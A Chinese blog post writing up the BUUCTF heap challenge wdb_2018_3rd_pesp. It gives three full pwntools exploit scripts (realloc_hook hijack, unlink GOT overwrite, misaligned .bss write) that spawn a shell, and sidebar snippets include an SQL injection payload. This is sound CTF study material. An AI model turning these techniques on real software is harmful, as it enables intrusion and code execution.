buuctf (网鼎杯)wdb_2018_3rd_pesp realloc_hook, unlink,写入bss段3种方法记录

最新推荐文章于 2024-08-05 20:41:43 发布
最新推荐文章于 2024-08-05 20:41:43 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/106128045
版权

写了一道2018网鼎的heap,漏洞挺多,尝试了3中方法解题,也算是对目前heap的学习进度的总结吧

题目本身是一道常规heap题,pie和got保护都没开,可以改写got表

①realloc_hook的做法:

先贴exp,然后慢慢解释
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './wdb_2018_3rd_pesp'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('', )
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


def add(leng, name):
	sla('Your choice:', str(2))
	sla('Please enter the length of servant name:', str(leng))
	sla('Please enter the name of servant:', name)

def edit(index, leng, name):
	sla('Your choice:', str(3))
	sla('Please enter the index of servant:', str(index))
	sla('Please enter the length of servant name:', str(leng))
	sla('Please enter the new name of the servnat:', name)

def show():
	sla('Your choice:', str(1))

def free(index):
	sla('Your choice:', str(4))
	sla('Please enter the index of servant:', str(index))

bss = 0x6020b5
free_plt = 0x00000000004006d0
add(0x18, 'aaaa') #0
add(0x18, 'bbbb') #1
add(0x68, 'cccc') #2
add(0x68, 'dddd') #3

edit(0, 0x20, 'a'*0x10+p64(0)+p64(0x91))
#gdb.attach(r)
free(1)
add(0x18, 'aaaa') #1
show()

libcbase = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3c4b78
info_addr('fun_addr', libcbase)

malloc_hook = libcbase + 0x3c4aed
info_addr('malloc_hook', malloc_hook)
realloc_hook = libcbase + 0x846C0
info_addr('realloc_hook', realloc_hook)
og = [0x45216, 0x4526a, 0xf02a4, 0xf1147, 0xcd0f3, 0xcd1c8, 0xf02b0, 0xf66f0]
one = libcbase + og[1]


free(2)
edit(1, 0x28, 'a'*0x18+p64(0x71)+p64(malloc_hook))
add(0x68, 'aaaa') #2
add(0x68, 'aaaa') #4
#gdb.attach(r)

#edit(4, 0x1b, p8(2)*3+p64(0)*2+p64(one))
edit(4, 0x1b, p8(2)*3+p64(0)+p64(one)+p64(realloc_hook))
#gdb.attach(r)
#gdb.attach(r,"b *$rebase(0x7ffff7a5226a)")
#add(255, 'aaaa')


r.interactive()

前半段就是正常的chunk extend,free(1)之后会把0x91的chunk放入unsortedbin,然后申请0x18的chunk把1申请回来,就会获得一个内容为main_arena + 0x58的chunk2,show之后就可得到main_arena + 0x58(88)的地址
以下来自:

https://www.cnblogs.com/luoleqi/p/12349714.html

unsortbin 有一个特性,就是如果 usortbin 只有一个 bin ,它的 fd 和 bk 指针会指向同一个地址(unsorted
bin 链表的头部),这个地址为 main_arena + 0x58 ,而且 main_arena 又相对 libc 固定偏移
0x3c4b20
,所以得到这个fd的值,然后减去0x58再减去main_arena相对于libc的固定偏移,即得到libc的基地址。所以我们需要把
chunk 改成大于 fastbin 的大小,这样 free 后能进入 unsortbin 让我们能够泄露 libc 基址。

得到libcbase,算出malloc_hook和realloc_hook,这题直接malloc_hook好像通不了,就用realloc_hook做了,
free(2),从1开始改写2的fd为malloc_hook,再申请两个chunk来往libcbase + 0x3c4aed里写东西
bin的情况:
在这里插入图片描述
申请两个chunk

malloc 时还需要再次绕过检测, malloc(0x68) 也就是 0x70 大小的 chunk
可以发现在0x7f2a8a09eaed 处构造块可以绕过检测(因为 7f 满足 0x70 大小),可以计算 0x7f2a8a09eaed 距离libc 基址的偏移为 0x3c4aed
(和上面的引用来自同一处)

realloc_hook

https://blog.csdn.net/Breeze_CAT/article/details/103789081
需要注意的是,malloc_hook和realloc_hook是连着的,也就是说只要找出malloc_hook前后一个满足这个条件的就可以同时修改这两个
相应的利用方法就是由传统的直接修改malloc_hook变为先修改realloc_hook为onegadget之后,修改malloc_hook到特定的一个push处或sub处,然后调用malloc便相当于执行了满足条件的onegadget。

大概因为是0xed,所以需要+3来恢复正常的8字节对齐(0xd+3=0x10)
最后
修改malloc_hook为realloc控制栈帧的地址
修改realloc_hook为onegadget
通过申请新chunk直接getshell

②unlink:

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './wdb_2018_3rd_pesp'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29566)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


def add(leng, name):
	sla('Your choice:', str(2))
	sla('Please enter the length of servant name:', str(leng))
	sla('Please enter the name of servant:', name)

def edit(index, leng, name):
	sla('Your choice:', str(3))
	sla('Please enter the index of servant:', str(index))
	sla('Please enter the length of servant name:', str(leng))
	sla('Please enter the new name of the servnat:', name)

def show():
	sla('Your choice:', str(1))

def free(index):
	sla('Your choice:', str(4))
	sla('Please enter the index of servant:', str(index))

target = 0x6020c8+0x10
fd = target - 0x18
bk = target - 0x10
add(0x20, 'aaaa') #0
add(0x30, 'bbbb') #1
add(0x80, 'cccc') #2
add(0x30, 'dddd') #3
#gdb.attach(r)

p = p64(0) + p64(0x30)
p += p64(fd) + p64(bk)
p += 'a'*0x10
p += p64(0x30) + p64(0x90)
edit(1, 0x40, p)
#gdb.attach(r) 
free(2)
#gdb.attach(r)
free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
atoi_got = elf.got['atoi']
p2 = 'a'*0x10 + p64(free_got) + p64(puts_got)
edit(1, 0x20, p64(0x20)+p64(free_got)+p64(0x20)+p64(atoi_got))
#gdb.attach(r)
edit(0, 0x7, p64(puts_plt))
#gdb.attach(r)
free(1)

fun_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
info_addr('fun_addr', fun_addr)
libc = LibcSearcher('atoi', fun_addr)
libcbase = fun_addr - libc.dump('atoi')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
#gdb.attach(r)
edit(0, 0x7, p64(system_addr))

edit(3, 0x7, '/bin/sh\x00')
free(3)

r.interactive()

这题的global,一个size一个地址
在这里插入图片描述
讲一下怎么找global
某个函数里找到结构体
在这里插入图片描述
双击
在这里插入图片描述
是个数组,是了

target = 0x6020c8+0x10
fd = target - 0x18
bk = target - 0x10

unlink的过程:申请4个chunk,伪造fake chunk,从要结合在一起的chunk开始填入,free(2),触发unlink,unlink之后任意地址改写(通过fd?),才可以改写全局变量数组(global或者bss)
接下来修改global,这题puts_got好像不行,我改用atoi_got了,global[0]为free_got,global[1]为atoi_got
这题还有一个null by one, 所以只写入0x7
这题最后一个字符的下一个字节置为0,所以只写入0x7
写入之后,修改free_got为puts_plt,free(1)就会把atoi_got的地址泄露出来
获得libcbase
改global[0]为system,
写/bin/sh到chunk3
free(3)触发sh

③写入bss:

exp:

from pwn import*
p = process('./wdb_2018_3rd_pesp')
#p=remote("node3.buuoj.cn",25429)
elf=ELF('./wdb_2018_3rd_pesp')
libc =ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add(size,content):
    p.recvuntil("choice:")
    p.sendline("2")
    p.recvuntil("name:")
    p.sendline(str(size))
    p.recvuntil("servant:")
    p.sendline(content)
def edit(index,size,content):
    p.recvuntil("choice:")
    p.sendline("3")
    p.recvuntil("servant:")
    p.sendline(str(index))
    p.recvuntil("name:")
    p.sendline(str(size))
    p.recvuntil("servnat:")
    p.sendline(content)
def show():
    p.recvuntil("choice:")
    p.sendline("1")
def free(index):
    p.recvuntil("choice:")
    p.sendline("4")
    p.recvuntil("servant:")
    p.sendline(str(index))
#bss = 0x6020b5
bss = 0x6020ad
add(0x60,"aaaa") #0
add(0x60,"aaaa") #1
add(0x60,"/bin/sh\x00") #2
free(1)
payload = "\x00"*0x60 + p64(0) + p64(0x71) + p64(bss)
edit(0,0x100,payload)
add(0x60,'aaaa')
#gdb.attach(p)
payload = "\x00"*3 + p64(0x100) + p64(0x602018)
add(0x60,payload)
#gdb.attach(p)
show()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['free']
system = libc_base + libc.sym['system']
puts = libc_base + libc.sym['puts']
log.success("LIBC:\t" + hex(libc_base))
    
payload = p64(system) + p64(puts)
edit(0,0x10,payload)
free(2)
p.interactive()

字节错位来做

因为presize域
fastbin 的fd是指向presize的
ad+0x10=0xbd
bd+3 = c0
到时候写内容是从0xbd开始的
你如果用05(b5)
那就是从0x15(c5)开始写
所以bss取0xad

用到stdin和stdout
在这里插入图片描述
在这里插入图片描述
往bss里写数据就是我们的目的
free(1), 改写1的fd指向bss(字节错位得到),然后往bss写入free_got
show获得free_got的地址,算出libcbase,
得到system,写入global[0]
free(2),sh

真岛忍
关注
【网络安全 | CTF】fakebook(网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
网鼎杯 2018 unfinish
feng的博客
10-29 2724
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
[网鼎杯2018]Unfinish
Sk1y的博客
02-08 399
[网鼎杯2018]Unfinish 文章目录[网鼎杯2018]Unfinish二次注入 二次注入 disearch扫一下,有login.php,还有register.php,对应登录注册功能 推测有二次注入,测试一下 注册时 12345678@qq.com 0'+ascii(substr((select * from flag)from 1 for 1))+'0; 123456 回显 fuzz的时候,发现, information被过滤了,看师傅们的wp,都是直接猜字名为flag,然后读取flag i
[网鼎杯2018]Unfinish解题,五分钟带你解题
最新发布
m0_69151365的博客
08-05 659
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入点,然后开始扫描目录寻找其他注入点,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入点是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 443
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
VxWorks是由Wind River Systems开发的一实时操作系统(RTOS),广泛应用于工业控制、航空航天等领域。WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
LED.zip_14489端口_STVD_Stvd led 例程_stm8s stvd
09-23
STM8S是STM8系列的一8位微控制器,具有丰富的外设接口和低功耗特性,广泛应用于各嵌入式系统。端口配置是微控制器编程的基础,包括设置输入输出方向、端口速度、中断等属性,以便控制硬件设备,如LED灯。 ...
Buu - [网鼎杯2018]Unfinish
2302_79839194的博客
05-14 288
但同时,如果是 1’ or ‘1’='1 又能成功注册,这是肯定是单引号闭合,但是因为不能在后面跟注释符,如何进行闭合。解析:注册账号,将信息放在数据库中,登录进来比对数据库,将对应用户名拿出来回显在页面中。注入点在注册页面的用户名处,测试过滤了什么 => 单引号 语句后面跟注释符也被过滤。-> url/register.php => 有回显,可以注册账号。-> 注册完进来之后没有什么信息,能观察的就是左边有自己的用户名。流程:注册账号 -> 登录进来 -> 回显的是用户名。
SQL注入:网鼎杯2018-unfinish
qq_68163788的博客
02-21 1293
SQL注入是一常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
XCTF:unfinish(2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1144
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 768
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
网鼎杯-2018-unfinish解题方法
Lemon_miko的博客
04-27 583
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两方式找其他界面,一是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
[网鼎杯2018]Unfinish 两方法 -----不会编程的崽
不会编程的崽的博客
03-26 1216
网鼎杯 二次注入 盲注
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 484
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值